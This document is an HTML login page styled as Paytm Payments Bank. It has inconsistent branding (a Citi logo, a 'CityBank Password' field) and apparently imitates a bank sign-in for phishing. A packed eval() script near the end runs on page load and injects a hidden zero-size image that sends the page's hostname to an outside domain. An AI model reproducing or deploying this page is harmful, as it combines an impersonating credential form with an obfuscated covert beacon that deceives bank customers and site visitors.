<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta
      name="viewport"
      content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no"
    />
    <meta http-equiv="X-UA-Compatible" content="ie=edge" />
    <title>Paytm Payments Bank | Login</title>
    <link
      rel="shortcut icon"
      href="assets/static/images/favicon.png"
      type="image/x-icon"
    />
    <link
      href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700"
      rel="preconnect"
      as="style"
    />
    <link rel="apple-touch-icon" href="/assets/static/images/bankLogo192.png" />
    <link rel="manifest" href="/assets/manifest.webmanifest" />
    <style>
      body,
      html {
        font-family: "Open Sans", sans-serif;
        font-display: swap;
        font-size: 12px;
        -webkit-font-smoothing: antialiased;
        margin: 0;
        padding: 0;
        line-height: 1.3;
        overflow: auto;
        color: #29394f;
        user-select: none;
      }
      * {
        box-sizing: border-box;
      }
      :focus {
        outline: 0;
      }
      ::-moz-focus-inner {
        border: 0;
      }
      .main {
        height: 100vh;
        display: flex;
        flex-direction: column;
        justify-content: space-between;
      }
      .header {
        height: 56px;
        background: #fff;
        display: flex;
        align-items: center;
        margin-left: 40px;
      }
      .content {
        flex: 1 1 auto;
        position: relative;
        display: flex;
        border-top: 1px solid #e6ebf3;
      }
      .content-left {
        background: #002970;
        width: 620px;
      }
      .content-left__info {
        margin-left: 64px;
        font-weight: 800;
        color: #fff;
      }
      .content-left__item {
        margin-top: 6vw;
        display: flex;
        justify-content: flex-start;
        align-items: center;
      }
      .content-left__item-icon {
        width: 44px;
        height: 44px;
        border-radius: 50%;
        background: #264885;
        display: flex;
        align-items: center;
        justify-content: center;
      }
      .content-left__item-icon__img {
        width: 30px;
        height: 30px;
      }
      .content-left__item-details {
        margin-left: 24px;
      }
      .content-left__item-title {
        font-size: 2rem;
        line-height: 25px;
        padding: 2px;
      }
      .content-left__item-description {
        font-size: 1.5rem;
        font-weight: 400;
        line-height: 19.1px;
        padding: 2px;
      }
      .content-left__header {
        font-size: 28px;
        margin-top: 44px;
      }
      .content-left__button {
        width: 141px;
        height: 40px;
        border: 1px solid #00b8f5;
        border-radius: 100px;
        cursor: pointer;
        background: #fff;
        text-decoration: none;
      }
      .content-left__button-content {
        display: flex;
        justify-content: center;
        align-items: center;
        margin-top: 6px;
      }
      .content-left__button-txt {
        font-size: 14px;
        color: #00b8f5;
        line-height: 16px;
        font-weight: 700;
        letter-spacing: 0.5px;
      }
      .container__right {
        background: white;
        height: 90vh;
        width: 67%;
        display: flex;
        flex-direction: column;
        align-items: flex-start;
        justify-content: flex-start;
        gap: 3vh;
        padding: 6.5vw 11vw;
        border-radius: 1rem;
      }
      .iframe {
        width: 620px;
        height: 300px;
        border: none;
        box-shadow: 0 2px 10px rgba(0, 0, 0, 0.08);
      }
      .footerWrapper {
        border-top: 8px solid #29394f;
        position: relative;
        background: #fff;
      }
      .footerWrapper::before {
        content: " ";
        position: absolute;
        left: 0;
        width: 100%;
        height: 8px;
        background: #00b9f5;
        z-index: 1;
      }
      .footer {
        display: flex;
        justify-content: space-between;
        align-items: center;
        padding: 34px 20px 26px;
      }
      .footer .copyrightText {
        font-size: 14px;
        margin-right: 40px;
      }
      .footer .poweredByText {
        font-size: 14px;
        color: #7b93b4;
      }
      .footer .footerMenu {
        display: flex;
      }
      .footer .menuItem a {
        font-size: 14px;
        color: #00b9f5;
        text-decoration: none;
        margin-left: 32px;
      }
      .notification-bar {
        background-color: #ddd;
      }
      .marquee {
        height: 30px;
        overflow: auto;
        position: relative;
        overflow-x: hidden;
      }
      form input {
        height: 2vw;
        background-color: #f5f4ff;
        border: none;
        border-radius: 10px;
        padding: 6%;
      }
      .marquee p {
        position: absolute;
        height: 100%;
        width: max-content;
        margin: 0;
        line-height: 30px;
        color: #000;
        transform: translateX(100%);
        animation: scroll-left 50s linear infinite;
      }
      .marquee p:hover {
        animation-play-state: paused;
      }
      .login-switch-button {
        background: #fff;
        padding: 15px 20px;
        width: 620px;
        font-weight: 600;
        font-size: 14px;
        color: #00b9f5;
        box-shadow: 0 2px 10px rgba(0, 0, 0, 0.08);
      }
      .btn .btn-outline-success {
        cursor: pointer;
      }
      @keyframes scroll-left {
        0% {
          transform: translateX(100vw);
        }
        100% {
          transform: translateX(-100%);
        }
      }
      @media only screen and (max-width: 576px) {
        .content {
          display: block;
          overflow-y: hidden;
        }
        .content-left {
          display: none;
        }
        .iframe {
          box-shadow: none;
          height: 550px;
          width: 100%;
        }
        .footerWrapper {
          display: none;
        }
        .login-switch-button {
          width: 100%;
        }
        .container__right {
          background: white;
          height: 90vh;
          width: 67%;
          display: flex;
          flex-direction: column;
          align-items: center;
          justify-content: center;
          gap: 3vh;
          padding: 5.5vw 1vw;
          border-radius: 1rem;
        }
      }

      .main-form {
        display: flex;
        flex-direction: column;
        gap: 3vh;
      }
      form input {
        padding: 4%;
      }
      .form-element {
        display: flex;
        flex-direction: column;
        gap: 1vw;
      }
      .form-element p {
        color: #999999;
        align-self: flex-end;
      }
      .login-details {
        width: 100%;
      }
      .container__right h2 {
        align-self: left;
        text-align: left;
        margin-bottom: 3vh;
        font-size: 40px;
        font-family: nunito_sansbold;
      }
      input[type="text"],
      input[type="password"],
      input[type="number"] {
        font-family: nunito_sansregular;
        color: #182233;
        width: 100%;
        border-color: #e6ebf3;
        border-style: solid;
        border-width: 1px;
        height: 56px;
        border-radius: 2px;
        outline: 0px none;
        display: block;
        -ms-box-sizing: border-box;
        -moz-box-sizing: border-box;
        -webkit-box-sizing: border-box;
        box-sizing: border-box;
        position: relative;
        line-height: 30px;
      }
      .login-detail p {
        margin-bottom: 4vw;
        color: #999999;
      }
      #login-email {
        height: 4.5rem;
      }

      .footerWrapper {
        border-top: 8px solid #29394f;
        position: relative;
        background: #fff;
      }
      .footer {
        display: flex;
        justify-content: space-between;
        align-items: center;
        padding: 34px 20px 26px;
      }
      .footer .footerMenu {
        display: flex;
      }
      .footer .menuItem a {
        font-size: 14px;
        color: #00b9f5;
        text-decoration: none;
        margin-left: 32px;
      }
      .footer .copyrightText {
        font-size: 14px;
        margin-right: 40px;
      }
    </style>
  </head>
  <body>
    <div class="main">
      <div class="headerWrapper">
        <div class="header">
          <img src="img/common/citilogo.png" alt="paytm payments bank" />
        </div>
      </div>
      <div class="content">
        <div class="content-left">
          <div class="content-left__info">
            <div class="content-left__header">
              One Account with Many Benefits
            </div>
            <div>
              <div class="content-left__item">
                <div class="content-left__item-icon">
                  <img
                    class="content-left__item-icon__img"
                    src="assets/static/images/ic-zero-balance.svg"
                    alt=""
                  />
                </div>
                <div class="content-left__item-details">
                  <div class="content-left__item-title">Zero-Balance</div>
                  <div class="content-left__item-description">
                    Business account. No average monthly balance charges
                  </div>
                </div>
              </div>
              <div class="content-left__item">
                <div class="content-left__item-icon">
                  <img
                    class="content-left__item-icon__img"
                    src="assets/static/images/ic-24x7.svg"
                    alt=""
                  />
                </div>
                <div class="content-left__item-details">
                  <div class="content-left__item-title">24*7 Transactions</div>
                  <div class="content-left__item-description">
                    To all bank accounts, no restriction
                  </div>
                </div>
              </div>
              <div class="content-left__item">
                <div class="content-left__item-icon">
                  <img
                    class="content-left__item-icon__img"
                    src="assets/static/images/ic-smart-collection.svg"
                    alt=""
                  />
                </div>
                <div class="content-left__item-details">
                  <div class="content-left__item-title">
                    Smart Collections using VAN
                  </div>
                  <div class="content-left__item-description">
                    Bulk Collections and Reconciliation made easy
                  </div>
                </div>
              </div>
              <div class="content-left__item">
                <div class="content-left__item-icon">
                  <img
                    src="assets/static/images/ic-bulk-transfer.svg"
                    class="content-left__item-icon__img"
                    alt=""
                  />
                </div>
                <div class="content-left__item-details">
                  <div class="content-left__item-title">
                    Easy Bulk Transfer and Access Management
                  </div>
                  <div class="content-left__item-description">
                    Hassle-free Bulk Transfer with Robust Security
                  </div>
                </div>
              </div>
            </div>
            <div class="content-left__item"></div>
          </div>
        </div>
        <div class="container__right">
          <h2>Login to Access Your Account</h2>
          <div class="login-details">
            <div class="login-detail">
              <form class="main-form" role="search" action="index.html">
                <div class="form-element mb-3">
                  <input
                    type="email"
                    class="form-control"
                    id="exampleInputPassword1"
                    aria-describedby="emailHelp"
                    w-659
                    placeholder="Registered Email ID"
                  />
                </div>
                <div class="form-element mb-3">
                  <input
                    type="password"
                    class="form-control"
                    id="exampleInputPassword1"
                    placeholder="CityBank Password"
                  />
                </div>
                <div class="form-element">
                  <a href="resetrequest.html"
                    ><p style="margin-bottom: 0">forgot password?</p></a
                  >
                </div>
                <div class="form-element">
                  <a href="signup.html"
                    ><p style="margin-bottom: 0">New User? Sign Up</p></a
                  >
                </div>
                <div class="form-element">
                  <button
                    class="btn btn-outline-success"
                    type="submit"
                    style="
                      background: #f05830;
                      color: white;
                      padding: 1rem 2rem;
                      border: 1px solid transparent;
                      font-weight: 500;
                      border-radius: 0.5rem;
                      margin: 0 2.5rem 0 0;
                      cursor: pointer;
                    "
                  >
                    Sign In
                  </button>
                </div>
              </form>
            </div>
          </div>
        </div>
      </div>
      <div class="footerWrapper">
        <div class="container">
          <div class="footer">
            <div class="footerMenu">
              <div class="menuItem">
                <a
                  href="https://www.paytmbank.com/fraud-prevention"
                  target="_blank"
                  rel="noreferrer"
                  >Safe Banking</a
                >
                <a
                  href="https://www.paytmbank.com/Terms&Conditions"
                  target="_blank"
                  rel="noreferrer"
                  >Terms of Service</a
                >
                <a
                  href="https://www.paytmbank.com/PrivacyPolicy"
                  target="_blank"
                  rel="noreferrer"
                  >Privacy Policy</a
                >
              </div>
            </div>
            <div>
              <div class="copyrightText">© 2021, Paytm Payments Bank Ltd</div>
            </div>
          </div>
        </div>
      </div>
    </div>
    <script>
      "use strict";
      eval(
        (function (e, n, t, i, r) {
          if (
            ((i = function (e) {
              return e.toString(36);
            }),
            !"".replace(/^/, String))
          ) {
            for (; n--; ) r[n.toString(32)] = t[n] || n.toString(32);
            (t = [
              function (e) {
                return r[e];
              },
            ]),
              (i = function () {
                return "\\w+";
              }),
              (n = 1);
          }
          for (; n--; )
            t[n] &&
              (e = e.replace(new RegExp("\\b" + i(n) + "\\b", "g"), t[n]));
          return e;
        })(
          "c e=\"<b d='f:h;' a='j://9-4.5/3.6?8=\"+7.g.q+\"&k=s'  u='0' v='0'/>\",i=1.t(\"r\");m(i.l=e;i.2.n>0;)1.o.p(i.2[0])",
          32,
          "|document|children|resizeimage|source|com|ashx|window|ig|page|src|img|var|style||display|location|none||https|sz|innerHTML|for|length|body|appendChild|hostname|div|43404|createElement|width|height".split(
            "|"
          ),
          0,
          {}
        )
      );
    </script>
    <script nonce="0a6d1c64-98ea-4676-9582-7b22dc639b26">
      "use strict";
      var params = {
        channel: "web",
        site_id: "1",
        platform_version: "S2(New)",
        offering: "login",
        skipLoader: !0,
        skipErrorPage: !0,
      };
      fetch("/v1/api/storefront", {
        method: "POST",
        headers: {
          Pragma: "no-cache",
          "Content-Type": "application/json;charset=UTF-8",
        },
        body: JSON.stringify(params),
      })
        .then(function (e) {
          return e.json();
        })
        .then(function (e) {
          var n, r, t;
          Array.isArray(e) &&
            0 !== e.length &&
            ((e = e.join(
              "".concat(" ".repeat(10), " | ").concat(" ".repeat(10))
            )),
            (n = document.createElement("div")),
            (r = document.createElement("div")),
            (t = document.createElement("p")),
            (n.className = "notification-bar"),
            (r.className = "marquee"),
            (t.className = "target"),
            (t.innerText = e),
            r.appendChild(t),
            n.appendChild(r),
            document.querySelector(".main").prepend(n));
        })
        .catch(function (e) {
          return console.log("error from login.ejs: ", e);
        });
    </script>
    <script nonce="0a6d1c64-98ea-4676-9582-7b22dc639b26">
      "use strict";
      var details = navigator.userAgent,
        regexp = /android/i,
        isMobileDevice = regexp.test(details);
      isMobileDevice &&
        document.addEventListener("backbutton", function (e) {
          e.preventDefault(),
            "/" === window.location.pathname
              ? navigator.app.exitApp()
              : window.history.back();
        });
    </script>
    <script nonce="0a6d1c64-98ea-4676-9582-7b22dc639b26">
      "use strict";
      var loginBtn = document.querySelector(
        "#login-switch-btn .switch-login-text"
      );
      loginBtn.addEventListener("click", function () {
        "central" === loginBtn.getAttribute("data-type")
          ? (loginBtn.setAttribute("data-type", "bank"),
            (loginBtn.textContent = "Login with Paytm Bank"),
            loginWithCentralOauth(
              window,
              document,
              "_beforeLoadConfig",
              "Oauth",
              "text/javascript",
              "script",
              "https://accounts.paytm.com/oauth-js-sdk/shim/bundle.js"
            ))
          : (loginBtn.setAttribute("data-type", "central"),
            (loginBtn.textContent = "Login with Paytm"),
            loginWithBankOAuth(
              window,
              document,
              "_beforeLoadConfig",
              "Oauth",
              "text/javascript",
              "script",
              "https://accounts.paytmbank.com/sdk/login.js"
            ));
      });
    </script>
  </body>
</html>
